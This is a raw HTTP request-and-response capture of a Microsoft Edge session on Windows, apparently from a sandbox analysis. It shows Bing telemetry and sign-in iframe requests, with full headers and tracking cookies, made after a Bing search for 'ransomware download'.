report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 986894C393654D7DA67658FF704D5B4B Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
set-cookie: .AspNetCore.Cookies=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; secure; samesite=lax; httponly
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327df9
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5FA24A1E00E147F89F7F4A286BDC0B38 Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:34Z
date: Thu, 29 Feb 2024 15:32:34 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220754.b328001
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220751111%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220751111%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CD021CEB83304F01848C8CE6D3E41B95 Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:34Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:34 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220754.b32807d
-
Remote address:92.123.128.152:443RequestGET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C9DFD79007D54D87B0C2499C7BB72B19 Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:34Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:34 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220754.b328324
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 297
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 385A9DA1EBCE49E88D250B3F2CACD0EF Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:35Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:35 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220755.b328dbd
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F47316A742724513AAC64BAE7FEAE27F Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:37Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:37 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220757.b32979e
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 22A5D45B4CBF435AB0307C95BE310E0D Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:37Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:37 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220757.b329cbf
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751457%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751784%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751828%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751936%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752420%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752512%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751457%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751784%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751828%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751936%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752420%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752512%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
